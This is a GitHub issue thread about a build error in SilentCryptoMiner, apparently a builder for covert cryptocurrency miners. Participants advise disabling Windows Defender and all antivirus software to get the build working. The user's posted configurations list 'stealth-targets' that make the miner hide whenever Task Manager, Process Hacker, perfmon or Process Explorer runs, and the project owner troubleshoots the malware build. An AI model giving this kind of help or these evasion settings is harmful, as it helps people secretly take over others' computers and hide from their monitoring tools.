### ISSUE TITLE
Watchdog error

### ISSUE THREAD

**Issue by LizXuan** [UnamSanctam/SilentCryptoMiner#666]
Hi, i am new, didnt use XMR silent miner nor ETH silent miner before. i setup the basic config (XMR and ETH) and when i click build button, the error log show:
Watchdog payload
Watchdog error. Any idea?

**Comment by Nobellium1** [comment]
Turn off windows defender and all other antiviruses and redownload the miner

**Comment by LizXuan** [comment]
i did turn off the window defender and antivirus while downloading the miner but i still get the error:
Error compiling Watchdog loader!
"Error: An error occured while building the file: The system cannot find the file specified."

these are my setting in both xmr and eth...

{
    "algo": "rx/0",
    "pool": "pool.supportxmr.com",
    "port": 3333,
    "wallet": "{walletAddress.workerName}",
    "password": "x",
    "nicehash": false,
    "ssltls": false,
    "max-cpu": 30,
    "idle-wait": 2,
    "idle-cpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": ""
}

{
    "url": "stratum://`{walletAddress}`.{workerName}@asia2.ethermine.org:4444",
    "algo": "ethash",
    "max-gpu": 70,
    "idle-wait": 2,
    "idle-gpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,Steam.exe",
    "kill-targets": ""
}

**Comment by UnamSanctam** [comment]
Seems like it cannot find the [MINERFILE]-watchdog.exe file, either your antivirus is removing it while building (like @Nobellium1 suggested) or maybe you're saving it in some location that can't be read. Try building it somewhere simple, like directly on your main drive, for example: `C:\Temp\` or something similar.
